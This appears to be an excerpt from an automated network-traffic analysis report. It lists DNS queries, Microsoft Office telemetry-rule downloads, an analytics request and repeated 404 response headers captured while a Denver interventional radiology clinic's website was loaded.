Source: global trafficHTTP traffic detected: GET /rules/rule702600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule703201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule700251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule703200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule700250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule700651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule700650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule703301v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule703300v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule701751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule701750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule701651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule701650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule702451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule702450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule701101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule701100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule120128v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule120119v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule224900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule704101v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule704100v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule704201v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule704200v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule704151v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule704150v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficDNS traffic detected: DNS query: mipscenter.com
Source: global trafficDNS traffic detected: DNS query: services.ohmd.com
Source: global trafficDNS traffic detected: DNS query: cdn.callrail.com
Source: global trafficDNS traffic detected: DNS query: img1.wsimg.com
Source: global trafficDNS traffic detected: DNS query: cdn.jsdelivr.net
Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: td.doubleclick.net
Source: global trafficDNS traffic detected: DNS query: googleads.g.doubleclick.net
Source: global trafficDNS traffic detected: DNS query: bsc-dataseed.binance.org
Source: global trafficDNS traffic detected: DNS query: www.youtube.com
Source: global trafficDNS traffic detected: DNS query: i0.wp.com
Source: global trafficDNS traffic detected: DNS query: stats.g.doubleclick.net
Source: global trafficDNS traffic detected: DNS query: i.ytimg.com
Source: global trafficDNS traffic detected: DNS query: static.doubleclick.net
Source: global trafficDNS traffic detected: DNS query: yt3.ggpht.com
Source: global trafficDNS traffic detected: DNS query: play.google.com
Source: global trafficDNS traffic detected: DNS query: events.api.secureserver.net
Source: global trafficDNS traffic detected: DNS query: csp.secureserver.net
Source: global trafficDNS traffic detected: DNS query: otelrules.svc.static.microsoft
Source: global trafficDNS traffic detected: DNS query: beacons.gcp.gvt2.com
Source: global trafficDNS traffic detected: DNS query: beacons.gvt2.com
Source: global trafficDNS traffic detected: DNS query: beacons2.gvt2.com
Source: global trafficDNS traffic detected: DNS query: beacons3.gvt2.com
Source: global trafficDNS traffic detected: DNS query: beacons4.gvt2.com
Source: unknownHTTP traffic detected: POST /ccm/collect?en=page_view&dl=https%3A%2F%2Fmipscenter.com%2F&scrsrc=www.googletagmanager.com&frm=0&rnd=518915583.1743111906&dt=Interventional%20Radiology%20in%20Denver%2C%20CO%20%7C%20MIPS%20Center&auid=1553177151.1743111906&navt=n&npa=0&gtm=45be53q1za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=102482433~102522474~102788824~102803279~102813109~102887800~102926062&tft=1743111905959&tfd=3492&apve=1 HTTP/1.1Host: www.google.comConnection: keep-aliveContent-Length: 0sec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Origin: https://mipscenter.comX-Client-Data: CLf3ygE=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeReferer: https://mipscenter.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 27 Mar 2025 21:45:10 GMTContent-Type: text/plainContent-Length: 18Connection: closeAccess-Control-Allow-Credentials: trueAccess-Control-Allow-Headers: *Access-Control-Allow-Methods: POST, GET, OPTIONSAccess-Control-Allow-Origin: *Access-Control-Max-Age: 600X-Nr-Trace-Id: 66e54c8ffe4bb8db45ce59a7a518b5b2X-Frame-Options: SAMEORIGINX-Xss-Protection: 1; mode=blockX-Content-Type-Options: nosniffReferrer-Policy: origin-when-cross-originStrict-Transport-Security: max-age=31536000; includeSubdomains
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 27 Mar 2025 21:45:11 GMTContent-Type: text/plainContent-Length: 18Connection: closeAccess-Control-Allow-Credentials: trueAccess-Control-Allow-Headers: *Access-Control-Allow-Methods: POST, GET, OPTIONSAccess-Control-Allow-Origin: *Access-Control-Max-Age: 600X-Nr-Trace-Id: ef2e73054534c48ef12d9d3665e41d1fX-Frame-Options: SAMEORIGINX-Xss-Protection: 1; mode=blockX-Content-Type-Options: nosniffReferrer-Policy: origin-when-cross-originStrict-Transport-Security: max-age=31536000; includeSubdomains
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 27 Mar 2025 21:45:12 GMTContent-Type: text/plainContent-Length: 18Connection: closeAccess-Control-Allow-Credentials: trueAccess-Control-Allow-Headers: *Access-Control-Allow-Methods: POST, GET, OPTIONSAccess-Control-Allow-Origin: *Access-Control-Max-Age: 600X-Nr-Trace-Id: 72eb03c407c6b07ca7c5c57d4d547d23X-Frame-Options: SAMEORIGINX-Xss-Protection: 1; mode=blockX-Content-Type-Options: nosniffReferrer-Policy: origin-when-cross-originStrict-Transport-Security: max-age=31536000; includeSubdomains
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 27 Mar 2025 21:45:12 GMTContent-Type: text/plainContent-Length: 18Connection: closeAccess-Control-Allow-Credentials: trueAccess-Control-Allow-Headers: *Access-Control-Allow-Methods: POST, GET, OPTIONSAccess-Control-Allow-Origin: *Access-Control-Max-Age: 600X-Nr-Trace-Id: 6b4bda8a335f11a76270c53d4575fe84X-Frame-Options: SAMEORIGINX-Xss-Protection: 1; mode=blockX-Content-Type-Options: nosniffReferrer-Policy: origin-when-cross-originStrict-Transport-Security: max-age=31536000; includeSubdomains
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 27 Mar 2025 21:45:14 GMTContent-Type: text/plainContent-Length: 18Connection: closeAccess-Control-Allow-Credentials: trueAccess-Control-Allow-Headers: *Access-Control-Allow-Methods: POST, GET, OPTIONSAccess-Control-Allow-Origin: *Access-Control-Max-Age: 600X-Nr-Trace-Id: 36da250203e255079acc0de6e60c7ddfX-Frame-Options: SAMEORIGINX-Xss-Protection: 1; mode=blockX-Content-Type-Options: nosniffReferrer-Policy: origin-when-cross-originStrict-Transport-Security: max-age=31536000; includeSubdomains
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 27 Mar 2025 21:45:14 GMTContent-Type: text/plainContent-Length: 18Connection: closeAccess-Control-Allow-Credentials: trueAccess-Control-Allow-Headers: *Access-Control-Allow-Methods: POST, GET, OPTIONSAccess-Control-Allow-Origin: *Access-Control-Max-Age: 600X-Nr-Trace-Id: f066b3e53dd679eb73f03fb6a01cd0f7X-Frame-Options: SAMEORIGINX-Xss-Protection: 1; mode=blockX-Content-Type-Options: nosniffReferrer-Policy: origin-when-cross-originStrict-Transport-Security: max-age=31536000; includeSubdomains
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 27 Mar 2025 21:45:15 GMTContent-Type: text/plainContent-Length: 18Connection: closeAccess-Control-Allow-Credentials: trueAccess-Control-Allow-Headers: *Access-Control-Allow-Methods: POST, GET, OPTIONSAccess-Control-Allow-Origin: *Access-Control-Max-Age: 600X-Nr-Trace-Id: 2797004c64e1a60396a799d70825030eX-Frame-Options: SAMEORIGINX-Xss-Protection: 1; mode=blockX-Content-Type-Options: nosniffReferrer-Policy: origin-when-cross-originStrict-Transport-Security: max-age=31536000; includeSubdomains
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 27 Mar 2025 21:45:15 GMTContent-Type: text/plainContent-Length: 18Connection: closeAccess-Control-Allow-Credentials: trueAccess-Control-Allow-Headers: *Access-Control-Allow-Methods: POST, GET, OPTIONSAccess-Control-Allow-Origin: *Access-Control-Max-Age: 600X-Nr-Trace-Id: 6c89b3cdb8c8510e8300228aa788b3d8X-Frame-Options: SAMEORIGINX-Xss-Protection: 1; mode=blockX-Content-Type-Options: nosniffReferrer-Policy: origin-when-cross-originStrict-Transport-Security: max-age=31536000; includeSubdomains
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 27 Mar 2025 21:45:16 GMTContent-Type: text/plainContent-Length: 18Connection: closeAccess-Control-Allow-Credentials: trueAccess-Control-Allow-Headers: *Access-Control-Allow-Methods: POST, GET, OPTIONSAccess-Control-Allow-Origin: *Access-Control-Max-Age: 600X-Nr-Trace-Id: 04160268a23c2ddfd76392d91eecc33bX-Frame-Options: SAMEORIGINX-Xss-Protection: 1; mode=blockX-Content-Type-Options: nosniffReferrer-Policy: origin-when-cross-originStrict-Transport-Security: max-age=31536000; includeSubdomains
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 27 Mar 2025 21:45:16 GMTContent-Type: text/plainContent-Length: 18Connection: closeAccess-Control-Allow-Credentials: trueAccess-Control-Allow-Headers: *Access-Control-Allow-Methods: POST, GET, OPTIONSAccess-Control-Allow-Origin: *Access-Control-Max-Age: 600X-Nr-Trace-Id: 6c3e7093ca25b2d9ff0a7e2fb82253e3X-Frame-Options: SAMEORIGINX-Xss-Protection: 1; mode=blockX-Content-Type-Options: nosniffReferrer-Policy: origin-when-cross-originStrict-Transport-Security: max-age=31536000; includeSubdomains
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 27 Mar 2025 21:45:16 GMTContent-Type: text/plainContent-Length: 18Connection: closeAccess-Control-Allow-Credentials: trueAccess-Control-Allow-Headers: *Access-Control-Allow-Methods: POST, GET, OPTIONSAccess-Control-Allow-Origin: *Access-Control-Max-Age: 600X-Nr-Trace-Id: 986fca1485e24a4653b5bfba8426d878X-Frame-Options: SAMEORIGINX-Xss-Protection: 1; mode=blockX-Content-Type-Options: nosniffReferrer-Policy: origin-when-cross-originStrict-Transport-Security: max-age=31536000; includeSubdomains
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49986
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49985
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49984
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49980
Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50131 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49979
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49978
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49976
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49975
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49974
Source: unknownNetwork traffic detected: HTTP traffic on port 50085 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49973
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49972
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49971
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49970
Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49969
Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49968
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49967
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49966
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49965
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49964
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49963
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49962
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49961
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49960
Source: unknownNetwork traffic detected: HTTP traffic on port 49966 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50108 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50073 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50028 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49959
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49958
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49957
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49956
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49955
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49954
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49953
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49952
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49951
Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49950
Source: unknownNetwork traffic detected: HTTP traffic on port 49944 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50051 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50153 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49949
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49948
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49947
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49946
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49945
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49944
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49943
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
Source: unknownNetwork traffic detected: HTTP traffic on port 50061 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
Source: unknownNetwork traffic detected: HTTP traffic on port 49968 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50026 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49682 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
Source: unknownNetwork traffic detected: HTTP traffic on port 50095 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50155 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49991 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
Source: unknownNetwork traffic detected: HTTP traffic on port 50038 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
Source: unknownNetwork traffic detected: HTTP traffic on port 50143 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49956 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50083 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49999
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49998
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49997
Source: unknownNetwork traffic detected: HTTP traffic on port 50121 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49993
Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49991
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49934 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49987
Source: unknownNetwork traffic detected: HTTP traffic on port 50036 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50151 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50116 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50071 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50106
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50105
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50108
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50107
Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50109
Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50100
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50102
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50101
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50104
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50103
Source: unknownNetwork traffic detected: HTTP traffic on port 49964 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50128 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50117
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50116
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50119
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50118
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50111
Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50110
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50113
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50112
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50115
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50114
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
